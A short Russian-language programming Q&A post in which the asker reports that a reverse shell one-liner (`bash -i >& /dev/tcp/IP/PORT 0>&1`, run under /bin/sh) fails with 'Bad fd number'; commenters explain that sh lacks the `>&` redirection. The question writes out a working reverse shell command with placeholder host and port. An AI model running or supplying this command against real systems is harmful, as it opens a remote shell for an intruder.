# Syntax error: Bad fd number BACKCONNECT

Tags: bash, sh

```
$ /bin/sh -c "bash -i >& /dev/tcp/IP/PORT 0>&1"
/bin/sh: 1: Syntax error: Bad fd number
```

При попытке осуществить baconnect появляется ошибка синтаксиса.

Comment: `sh` не знает такого перенаправления `>&` — отсюда и ошибка... перенаправление stdin тоже выглядит странно, хотя скорей всего и сработает... ну и бла-бла-бла про потенциальную дыру в безопасности...

Comment: Меньше используйте башизмов, и ваша жизнь наладится!